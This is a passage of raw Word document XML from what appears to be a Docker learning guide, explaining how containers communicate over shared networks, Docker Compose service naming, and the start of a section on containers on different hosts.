          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You'd have to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAFAFCC"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xml:space="preserve">Connect both containers to a </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using docker network connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8071D"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xml:space="preserve">Or use </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Compose</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which creates a shared network automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35D3DB" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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BC805E">
          <v:rect id="_x0000_i3364" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D36C0" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using Docker Compose (Easiest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FA3472"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Docker Compose automatically connects all defined services in the same custom network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BAEB4F"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version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE1ECC5"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services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58452ED0"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xml:space="preserve">  app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7121B4F4"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xml:space="preserve">    image: my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527FB36"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xml:space="preserve">  db:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD2926"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xml:space="preserve">    image: postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14806B2D"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Here, app can reach db with hostname = db.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C650E" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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4957070">
          <v:rect id="_x0000_i3365" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD9D69" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC7806"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xml:space="preserve">By default, Docker assigns </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private IPs</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C53E79"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xml:space="preserve">You should </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not use IPs directly</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, use </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container names</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as DNS names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA5596" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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4074DCF">
          <v:rect id="_x0000_i3366" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B24D15" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">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56"/>
        <w:gridCol w:w="1826"/>
        <w:gridCol w:w="4063"/>
      </w:tblGrid>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="45D83CF5" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0344068F" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63BC4D07" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can Communicate?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49E3DE69" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="19AA9B3B" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13A7628A"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Same custom Docker network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177C1251"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD75A29"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Use container name as hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="68F8C947" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4111F316"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Default bridge network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68A765DC"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78FBA513"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Manual port mapping required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="7CB8EAAE" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4EA0E8"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Different networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027F9E48"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E7D3E5"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Need to connect both to a common network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="3F84AFF9" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D101B1B"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Docker Compose services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DECCB6D"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="009156EA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1044EEAA"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Uses common network automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44BCA065" w14:textId="5700BF07" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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E434D7E">
          <v:rect id="_x0000_i3367" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B6DB9" w14:textId="44197480" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="002B7C72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="835" w:name="_Toc196308315"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If both are with different hosts then whether they will be able to communicate with each other or not</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="835"/>
    </w:p>
    <w:p w14:paraId="6C70B56F" w14:textId="6720D36F" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two containers are running on different hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, they </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot communicate directly</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Docker's default network setup. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">yes, they </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> communicate</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — but it requires some setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED55F7" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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40899BC">
          <v:rect id="_x0000_i3368" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07BB46" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ways to Enable Communication Between Containers on Different Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A83E67" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Use Public IP or DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566EC451"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xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container A (on Host A)</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wants to talk to </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container B (on Host B)</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
